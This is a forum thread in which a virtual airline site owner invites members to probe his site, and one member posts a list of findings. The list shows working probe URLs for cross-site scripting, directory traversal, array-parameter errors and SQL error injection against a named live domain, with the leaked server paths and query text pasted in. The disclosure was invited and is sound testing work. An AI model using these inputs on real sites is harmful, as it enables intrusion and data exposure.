Vista Security!

[Crew-Portal]

Why did I call this post vista security? Check my website and find out! Can someone use SQL injection and try to register themself using SQL Injection. But Please dont register the other way I really dont want anyone signed up unless they are working for this airline! Thanks in advance and ya... have fun. Also if you do use SQL please dont drop any of my databases! Please!  :'(

[Crew-Portal]

Oops I guess I should give you a link! www.cmxva.com

[agentsteal]

Array:

http://www.cmxva.com/index.php?page=flights&p[]

 

Array:

http://www.cmxva.com/index.php?page[]

 

Array:

http://www.cmxva.com/index.php?page=profile&call[]

 

Cross Site Scripting:

http://www.cmxva.com/index.php?page=<marquee>vulnerable</marquee>

 

Cross Site Scripting:

http://www.cmxva.com/index.php?page=flights&p="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.cmxva.com/index.php?page=profile&call=<marquee><h1>vulnerable</marquee>

 

Directory Transversal:

http://www.cmxva.com/?page=../index

 

Full Path Disclosure:

http://www.cmxva.com/?page=../../

Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(pages/../../.php) is not within the allowed path(s): (/home/cmxvaco/:/usr/lib/php:/usr/local/lib/php:/tmp) in /home/cmxvaco/public_html/index.php on line 149

 

Full Path Disclosure:

http://www.cmxva.com/?page=../forums/index

Warning: include(./extension.inc) [function.include]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/forums/index.php on line 25

 

Warning: include() [function.include]: Failed opening './extension.inc' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/forums/index.php on line 25

 

Warning: include(./common.) [function.include]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/forums/index.php on line 26

 

Warning: include() [function.include]: Failed opening './common.' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/forums/index.php on line 26

 

Fatal error: Call to undefined function session_pagestart() in /home/cmxvaco/public_html/forums/index.php on line 31

 

Full Path Disclosure:

http://www.cmxva.com/index.php?page=flights&s[]

Warning: Illegal offset type in /home/cmxvaco/public_html/pages/flights.php on line 86

 

Full Path Disclosure:

http://www.cmxva.com/?page=FsPgetflight

Warning: require(FsPadmin/setting.php) [function.require]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/FsPgetflight.php on line 4

 

Fatal error: require() [function.require]: Failed opening required 'FsPadmin/setting.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/FsPgetflight.php on line 4

 

Full Path Disclosure:

http://www.cmxva.com/pages/account.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/account.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/account.php on line 2

 

Warning: Cannot modify header information - headers already sent by (output started at /home/cmxvaco/public_html/pages/account.php:2) in /home/cmxvaco/public_html/pages/account.php on line 7

 

Full Path Disclosure:

http://www.cmxva.com/pages/aircraft.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/aircraft.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/aircraft.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/fleet.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/fleet.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/fleet.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/FsPgetflight.php

Warning: require(FsPadmin/setting.php) [function.require]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/FsPgetflight.php on line 4

 

Fatal error: require() [function.require]: Failed opening required 'FsPadmin/setting.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/FsPgetflight.php on line 4

 

Full Path Disclosure:

http://www.cmxva.com/pages/lost.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/lost.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/lost.php on line 2

 

Warning: Cannot modify header information - headers already sent by (output started at /home/cmxvaco/public_html/pages/lost.php:2) in /home/cmxvaco/public_html/pages/lost.php on line 7

 

Full Path Disclosure:

http://www.cmxva.com/pages/loa.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/loa.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/loa.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/members.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/members.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/members.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/postflight.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/postflight.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/postflight.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/remove.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/remove.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/remove.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/training.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/training.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/training.php on line 2

 

Includes Directory:

http://www.cmxva.com/pages/

 

Maximum Length:

If you edit the input boxes when you register you can remove the maximum lengths.

 

SQL Error:

http://www.cmxva.com/index.php?page=profile&call='

A fatal MySQL error occured.

Query: SELECT * FROM flights WHERE PilotName = 'CMX-\'' ORDER BY FlightDate LIMIT 0,50

Error: (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1